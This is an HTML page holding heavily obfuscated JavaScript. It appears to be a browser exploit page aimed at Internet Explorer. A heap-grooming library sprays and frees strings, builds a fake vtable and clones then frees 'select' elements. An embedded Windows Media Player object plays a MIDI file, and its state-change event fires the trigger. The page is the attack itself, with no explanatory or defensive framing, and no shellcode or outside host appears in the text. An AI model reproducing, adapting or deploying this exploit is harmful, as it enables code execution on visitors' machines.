<html>
<head>
<script language='javascript'>

</script>

<script language='javascript'>
  function rxb76() {

}
rxb76.ie = function(PJlUpaHgGAhvuhZ, L00A4xDnRXLq) {
  this.maxAlloc = (PJlUpaHgGAhvuhZ ? PJlUpaHgGAhvuhZ : ((02*015+3)*('JuzP'.length*('f'.length*(02*(0x3*0x24+15)+79)+182)+198)+981));
  this.heapBase = (L00A4xDnRXLq ? L00A4xDnRXLq : (01*(0x1*('T'.length*586806+147548)+498029)+143873));
  this.paddingStr = String.fromCharCode(65,0101,0x41,65);
  while('lEUk'.length + this.paddingStr.length * 'Nr'.length + 'li'.length < this.maxAlloc) {
this.paddingStr += this.paddingStr;
  }
  this.mem = new Array();
  this.flushOleaut32();
};
rxb76.ie.prototype.debug = function(J$llu_PxmF) {
  void((Math.atan2((0x1*32183+15623), J$llu_PxmF)));
};
rxb76.ie.prototype.debugHeap = function(yUwJx8_h11) {
  if(yUwJx8_h11 == true) void((Math.atan(('M'.length*('S'.length*073565+5683)+11542)))); else void((Math.asin((0x1*(5*7407+6625)+4146))));
};
rxb76.ie.prototype.debugBreak = function(J$llu_PxmF) {
  void((Math.acos(('i'.length*42921+4885))));
};
rxb76.ie.prototype.padding = function(J12) {
  if(J12 > this.paddingStr.length) throw String.fromCharCode(0x52,0145,0161,117,0x65,115,0x74,101,100,32,0x70,0x61,0144,0144,105,0156,0147,0x20,115,0164,0x72,0x69,0x6e,103,040,0x6c,0x65,110,103,0164,0150,0x20) + J12 + (function () { var KLdE="y ",Tzif=" onl",XWnu=","; return XWnu+Tzif+KLdE })() + this.paddingStr.length + (function () { var VbNJ="e",yLbj="ailabl",yplT=" a",fXGr="v"; return yplT+fXGr+yLbj+VbNJ })();
  return this.paddingStr.substr(('MpXJe'.length - 5), J12);
};
rxb76.ie.prototype.round = function(ednh5psPt8f, ctKdQPB) {
  if(ctKdQPB == ('w'.length - 1)) throw String.fromCharCode(0x52,111,0165,110,0x64,32,0x61,0162,103,0165,0155,101,110,116,040,0143,97,0x6e,0x6e,0157,116,32,0142,0145,0x20,48);
  return parseInt((ednh5psPt8f + (ctKdQPB - 'H'.length)) / ctKdQPB) * ctKdQPB;
};
rxb76.ie.prototype.hex = function(ednh5psPt8f, KhP2Kzjf06s7) {
  var EKJAx7Gc = (function () { var etEg="9ABCDEF",JKqW="5678",IJjS="01",mOLu="234"; return IJjS+mOLu+JKqW+etEg })();
  var TEpNZiXqBvx = EKJAx7Gc.substr(ednh5psPt8f & ('m'.length*'ZzGINDVc'.length+7), 'o'.length);
  while(ednh5psPt8f > (05*'LYq'.length+0)) {
ednh5psPt8f = ednh5psPt8f >>> 'PafM'.length;
TEpNZiXqBvx = EKJAx7Gc.substr(ednh5psPt8f & ('xf'.length*0x7+1), 'p'.length) + TEpNZiXqBvx;
  }
  var KhP2Kzjf06s7 = (KhP2Kzjf06s7 ? KhP2Kzjf06s7 : ('NyTip'.length - 5));
  while(TEpNZiXqBvx.length < KhP2Kzjf06s7) TEpNZiXqBvx = (function () { var MLWP="0"; return MLWP })() + TEpNZiXqBvx;
  return TEpNZiXqBvx;
};
rxb76.ie.prototype.addr = function(vo659ftNSuS) {
  return unescape(String.fromCharCode(045,0x75) + this.hex(vo659ftNSuS & ('o'.length*0176707+568), 'PuLD'.length) + String.fromCharCode(045,117) + this.hex((vo659ftNSuS >> (16*'u'.length+0)) & (02*('f'.length*0x4b96+8296)+10243), 'fJZI'.length));
};
rxb76.ie.prototype.allocOleaut32 = function(A_h3dMK7OV71g, T_IUSwk) {
  var kHRscW2f;
  if(typeof A_h3dMK7OV71g == String.fromCharCode(0x73,0x74,0162,0x69,0156,0x67) || A_h3dMK7OV71g instanceof String) kHRscW2f = 'ccPU'.length + A_h3dMK7OV71g.length * 'lW'.length + 'tI'.length; else kHRscW2f = A_h3dMK7OV71g;
  if((kHRscW2f & ('vTlyN'.length*'Mtp'.length+0)) != ('yLA'.length - 3)) throw (function () { var ZGjo="ize ",WDfX="o",jlBJ="A",dhFk="n",hOdS="ocati",TvQm=" s",ocdw="ll"; return jlBJ+ocdw+hOdS+WDfX+dhFk+TvQm+ZGjo })() + kHRscW2f + String.fromCharCode(0x20,0155,0x75,115,116,040,0x62,0145,040,0x61,040,0155,117,108,0164,0x69,0x70,108,0x65,0x20,0x6f,0x66,0x20,0x31,0x36);
  if(this.mem[T_IUSwk] === undefined) this.mem[T_IUSwk] = new Array();
  if(typeof A_h3dMK7OV71g == String.fromCharCode(0x73,0164,114,0x69,0156,0147) || A_h3dMK7OV71g instanceof String) {
this.mem[T_IUSwk].push(A_h3dMK7OV71g.substr(('c'.length - 1), A_h3dMK7OV71g.length));
  } else {
this.mem[T_IUSwk].push(this.padding((A_h3dMK7OV71g - 'EgxsZc'.length) / 'AR'.length));
  }
};
rxb76.ie.prototype.freeOleaut32 = function(T_IUSwk) {
  delete this.mem[T_IUSwk];
  CollectGarbage();
};
rxb76.ie.prototype.flushOleaut32 = function() {
  this.debug(String.fromCharCode(70,0x6c,0165,115,0150,105,110,0147,0x20,0164,0x68,0x65,32,0117,0114,0105,0x41,0x55,0124,51,50,32,0143,97,0x63,0x68,0x65));
  this.freeOleaut32(String.fromCharCode(0157,0x6c,101,0141,117,0x74,0x33,50));
  for(var c5Pyn43PXRwSBZ = ('N'.length - 1); c5Pyn43PXRwSBZ < 'EKtYSD'.length; c5Pyn43PXRwSBZ++) {
this.allocOleaut32((03*'WDvScUshO'.length+5), (function () { var qPuM="32",fjYH="t",xbPe="o",WRFb="leau"; return xbPe+WRFb+fjYH+qPuM })());
this.allocOleaut32(('uz'.length*0x19+14), (function () { var yqSs="32",NnZG="leaut",JhDD="o"; return JhDD+NnZG+yqSs })());
this.allocOleaut32(('DQaepQx'.length*('s'.length*035+6)+11), (function () { var UctO="32",wIGh="aut",vhlP="ole"; return vhlP+wIGh+UctO })());
this.allocOleaut32((1*('SIyv'.length*015275+3303)+2085), (function () { var qudn="32",Eyhg="t",ccyT="oleau"; return ccyT+Eyhg+qudn })());
  }
};
rxb76.ie.prototype.alloc = function(A_h3dMK7OV71g, T_IUSwk) {
  var kHRscW2f;
  if(typeof A_h3dMK7OV71g == String.fromCharCode(0x73,0164,0x72,0x69,0156,103) || A_h3dMK7OV71g instanceof String) kHRscW2f = 'fnrC'.length + A_h3dMK7OV71g.length * 'lH'.length + 'PE'.length; else kHRscW2f = A_h3dMK7OV71g;
  if(kHRscW2f == ('E'.length*034+4) || kHRscW2f == ('NR'.length*040+0) || kHRscW2f == (2*(0x4*0x1f+3)+2) || kHRscW2f == ('GtanqEx'.length*(1*3245+1271)+1156)) throw String.fromCharCode(0x41,108,108,0x6f,0x63,0141,116,105,111,0156,040,115,105,122,0145,0x73,0x20) + kHRscW2f + (function () { var ZtBS="he",HaBT="ut",dPcW=" can",HwBx=" ",yKaW="e",xnVC="of",mxNg="flu",UWVf=" th",mNnb="he",hZMO="e ",Byfj=" ",MYDG="OLEAU",KmCY="not b",SwiL="T",NEAz="s",ImJd="3",lZfo="o",uFwH="2 ",tYvu="d",TSeR="cac",eAOh=" "; return dPcW+KmCY+yKaW+eAOh+mxNg+NEAz+mNnb+tYvu+Byfj+lZfo+HaBT+HwBx+xnVC+UWVf+hZMO+MYDG+SwiL+ImJd+uFwH+TSeR+ZtBS })();
  this.allocOleaut32(A_h3dMK7OV71g, T_IUSwk);
};
rxb76.ie.prototype.free = function(T_IUSwk) {
  this.freeOleaut32(T_IUSwk);
  this.flushOleaut32();
};
rxb76.ie.prototype.gc = function() {
  this.debug(String.fromCharCode(0x52,0165,0x6e,0x6e,105,0156,103,32,116,0x68,0145,0x20,0147,97,114,0142,97,103,0145,040,0143,111,0x6c,0154,0x65,99,0164,0157,0x72));
  CollectGarbage();
  this.flushOleaut32();
};
rxb76.ie.prototype.freeList = function(A_h3dMK7OV71g, XMZc7swxZ) {
  var XMZc7swxZ = (XMZc7swxZ ? XMZc7swxZ : 'y'.length);
  for(var c5Pyn43PXRwSBZ = ('pxQRZGa'.length - 7); c5Pyn43PXRwSBZ < XMZc7swxZ; c5Pyn43PXRwSBZ++) {
this.alloc(A_h3dMK7OV71g);
this.alloc(A_h3dMK7OV71g, (function () { var ticf="ist",UtpK="freeL"; return UtpK+ticf })());
  }
  this.alloc(A_h3dMK7OV71g);
  this.free((function () { var bEhF="t",hEAc="eeLis",unyN="fr"; return unyN+hEAc+bEhF })());
};
rxb76.ie.prototype.lookaside = function(A_h3dMK7OV71g, XMZc7swxZ) {
  var kHRscW2f;
  if(typeof A_h3dMK7OV71g == String.fromCharCode(0x73,0x74,0x72,105,0x6e,103) || A_h3dMK7OV71g instanceof String) kHRscW2f = 'Gcru'.length + A_h3dMK7OV71g.length * 'LE'.length + 'yZ'.length; else kHRscW2f = A_h3dMK7OV71g;
  if((kHRscW2f & (0x1*'LmFQSAWc'.length+7)) != ('AnyR'.length - 4)) throw String.fromCharCode(65,0154,0154,0x6f,0x63,0141,116,105,0157,0156,040,0163,105,0172,101,040) + kHRscW2f + String.fromCharCode(040,109,117,115,0x74,040,0142,0145,32,0x61,32,0x6d,0x75,108,116,0x69,0160,108,101,0x20,111,0146,32,49,54);
  if(kHRscW2f + 'eBuKJcvj'.length >= ('Pl'.length*('AxfYI'.length*(01*0106+12)+13)+178)) throw (String.fromCharCode(0x4d,0141,120,0151,0155,0165,109,040,108,0x6f,0x6f,107,97,0x73,0151,0x64,0145,040,0142,0154,111,0x63,0x6b,32,115,0151,122,101,0x20,105,115,040,49,48,060,070,040,0142,0x79,0x74,101,0163));
  var XMZc7swxZ = (XMZc7swxZ ? XMZc7swxZ : 'F'.length);
  for(var c5Pyn43PXRwSBZ = ('sXEizQ'.length - 6); c5Pyn43PXRwSBZ < XMZc7swxZ; c5Pyn43PXRwSBZ++) this.alloc(A_h3dMK7OV71g, (function () { var hTbT="ide",kLbZ="s",ULXM="looka"; return ULXM+kLbZ+hTbT })());
  this.free(String.fromCharCode(0154,0157,0x6f,107,0x61,115,0151,0144,0145));
};
rxb76.ie.prototype.lookasideAddr = function(A_h3dMK7OV71g) {
  var kHRscW2f;
  if(typeof A_h3dMK7OV71g == (function () { var QAbI="ring",evhh="st"; return evhh+QAbI })() || A_h3dMK7OV71g instanceof String) kHRscW2f = 'AmJQ'.length + A_h3dMK7OV71g.length * 'Me'.length + 'Pv'.length; else kHRscW2f = A_h3dMK7OV71g;
  if((kHRscW2f & ('c'.length*(0x2*'ZtMa'.length+2)+5)) != ('s'.length - 1)) throw String.fromCharCode(65,108,108,0x6f,99,0141,116,0151,0x6f,0x6e,040,115,0x69,0x7a,0145,32) + kHRscW2f + String.fromCharCode(32,109,0165,0x73,0164,32,0x62,0145,040,0x61,040,0155,0x75,108,116,0x69,112,108,101,040,111,102,32,49,066);
  if(kHRscW2f + 'dyNnHRsj'.length >= (0x6*(2*(0x1*0x35+8)+30)+112)) throw ((function () { var oFQO="s",hyPR="i",rDIe="M",YyCq="s 1008",roDR="s",xXCE=" ",xTGV="e block size ",Hjra="byte",HAxg="id",WHSI="aximum looka"; return rDIe+WHSI+roDR+HAxg+xTGV+hyPR+YyCq+xXCE+Hjra+oFQO })());
  return this.heapBase + (0x1*0x48a+510) + ((kHRscW2f + 'SHSMwAcG'.length) / 'CGeilhOc'.length) * ('p'.length*0x30+0);
};
rxb76.ie.prototype.vtable = function(Y6FBls1$S8wpdg, VpnXQ, kHRscW2f) {
  var kHRscW2f = (kHRscW2f ? kHRscW2f : (0x2*((0x1*0x15+12)*('P'.length*('Xb'.length*04+2)+1)+4)+274));
  if((kHRscW2f & (01*014+3)) != ('rMXnXqdml'.length - 9)) throw String.fromCharCode(0126,0x74,0x61,0142,0154,101,0x20,0163,105,0x7a,0x65,0x20) + kHRscW2f + String.fromCharCode(0x20,0x6d,117,0x73,0x74,040,0x62,0145,0x20,0x61,040,0x6d,0165,108,0x74,0151,0160,0x6c,0x65,0x20,0157,0x66,0x20,0x31,066);
  if(Y6FBls1$S8wpdg.length * 'aK'.length > kHRscW2f - ('C'.length*136+2)) throw (String.fromCharCode(0x4d,0x61,120,0x69,109,117,0155,32,115,0150,0145,0154,0x6c,0x63,0x6f,0144,101,040,0154,101,0156,0147,0164,104,040,105,115,32) + (kHRscW2f - ('AQ'.length*0x3a+22)) + (function () { var sZXR="s",kWdI="e",QsWV=" byt"; return QsWV+kWdI+sZXR })());
  var NtB = unescape(String.fromCharCode(37,117,57,0x30,57,060,37,0x75,067,99,0145,0142));
  for(var c5Pyn43PXRwSBZ = ('eatLljVRL'.length - 9); c5Pyn43PXRwSBZ < (0x14*6+4) / 'OfJH'.length; c5Pyn43PXRwSBZ++) NtB += this.addr(VpnXQ);
  NtB += unescape((function () { var iiaB="028",SicL="8%u",WQDL="%",XjRa="0",JavL="02",TEZM="u0"; return WQDL+TEZM+JavL+SicL+XjRa+iiaB })()) + Y6FBls1$S8wpdg + heap.padding((kHRscW2f - (('P'.length*0x14+7)*'eJXQO'.length+3)) / 'Kb'.length - Y6FBls1$S8wpdg.length);
  return NtB;
};
var M2iLpBZe1 = new rxb76.ie();
var fTWjytpuBI = document.createElement((function () { var MGYM="ect",uNDg="el",bxWT="s"; return bxWT+uNDg+MGYM })());
fTWjytpuBI.w0 = alert;
fTWjytpuBI.w1 = unescape(String.fromCharCode(0x25,0165,061,98,0144,060,0x25,0x75,0x30,0x63,0x30,99));
fTWjytpuBI.w2 = alert;
fTWjytpuBI.w3 = alert;
fTWjytpuBI.w4 = alert;
fTWjytpuBI.w5 = alert;
fTWjytpuBI.w6 = alert;
fTWjytpuBI.w7 = alert;
fTWjytpuBI.w8 = alert;
fTWjytpuBI.w9 = alert;
fTWjytpuBI.w10 = alert;
fTWjytpuBI.w11 = alert;
fTWjytpuBI.w12 = alert;
fTWjytpuBI.w13 = alert;
fTWjytpuBI.w14 = alert;
fTWjytpuBI.w15 = alert;
fTWjytpuBI.w16 = alert;
fTWjytpuBI.w17 = alert;
fTWjytpuBI.w18 = alert;
fTWjytpuBI.w19 = alert;
fTWjytpuBI.w20 = alert;
fTWjytpuBI.w21 = alert;
fTWjytpuBI.w22 = alert;
fTWjytpuBI.w23 = alert;
fTWjytpuBI.w24 = alert;
fTWjytpuBI.w25 = alert;
fTWjytpuBI.w26 = alert;
fTWjytpuBI.w27 = alert;
fTWjytpuBI.w28 = alert;
fTWjytpuBI.w29 = alert;
fTWjytpuBI.w30 = alert;
fTWjytpuBI.w31 = alert;
fTWjytpuBI.w32 = alert;
fTWjytpuBI.w33 = alert;
fTWjytpuBI.w34 = alert;
fTWjytpuBI.w35 = alert;
fTWjytpuBI.w36 = alert;
fTWjytpuBI.w37 = alert;
fTWjytpuBI.w38 = alert;
fTWjytpuBI.w39 = alert;
fTWjytpuBI.w40 = alert;
fTWjytpuBI.w41 = alert;
fTWjytpuBI.w42 = alert;
fTWjytpuBI.w43 = alert;
fTWjytpuBI.w44 = alert;
fTWjytpuBI.w45 = alert;
fTWjytpuBI.w46 = alert;
fTWjytpuBI.w47 = alert;
fTWjytpuBI.w48 = alert;
fTWjytpuBI.w49 = alert;
fTWjytpuBI.w50 = alert;
fTWjytpuBI.w51 = alert;
fTWjytpuBI.w52 = alert;
fTWjytpuBI.w53 = alert;
fTWjytpuBI.w54 = alert;
fTWjytpuBI.w55 = alert;
fTWjytpuBI.w56 = alert;
fTWjytpuBI.w57 = alert;
fTWjytpuBI.w58 = alert;
fTWjytpuBI.w59 = alert;
fTWjytpuBI.w60 = alert;
fTWjytpuBI.w61 = alert;
fTWjytpuBI.w62 = alert;
fTWjytpuBI.w63 = alert;
var bA5X2Bm$kg = new Array((1*(16*(3*(01*17+1)+5)+53)+3));
function sxlhwnG() {
  M2iLpBZe1.gc();
  var c5Pyn43PXRwSBZ = ('KucrLkffjQ'.length - 10);
  while(c5Pyn43PXRwSBZ < (0x2*(2*0xb0+104)+88)) {
bA5X2Bm$kg[c5Pyn43PXRwSBZ] = fTWjytpuBI.cloneNode(true);
c5Pyn43PXRwSBZ = c5Pyn43PXRwSBZ + 't'.length;
  }
  var zUfBG = ('erBL'.length - 4);
  while(zUfBG < (2*0x1ee+12)) {
delete bA5X2Bm$kg[zUfBG];
CollectGarbage();
zUfBG = zUfBG + 'vd'.length;
  }
}
sxlhwnG();
function QPGUfw() {
  var L1jzGC = ('oo'.length*347+305);
  while(L1jzGC > ('zJKqcO'.length - 6)) {
if(typeof (bA5X2Bm$kg[L1jzGC].w1) == String.fromCharCode(115,0x74,114,0151,0x6e,0x67)) {

} else {
  bA5X2Bm$kg[L1jzGC].w1((function () { var Olvm='!',zwpk='e on',lLtG='co',kyfL='m'; return lLtG+kyfL+zwpk+Olvm })());
}
L1jzGC = L1jzGC - 'Mm'.length;
  }
  sxlhwnG();
  document.audio.Play();
}
</script>
<script for=audio event=PlayStateChange(oldState,newState)>
  if (oldState == 3 && newState == 0) {
    QPGUfw();
  }
</script>
</head>
<body>
  <object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
    <param name="fileName" value="/10/gMSSf.mid">
    <param name="SendPlayStateChangeEvents" value="true">
    <param NAME="AutoStart" value="True">
    <param name="uiMode" value="mini">
    <param name="Volume" value="-300">
  </object>
</body>
</html>
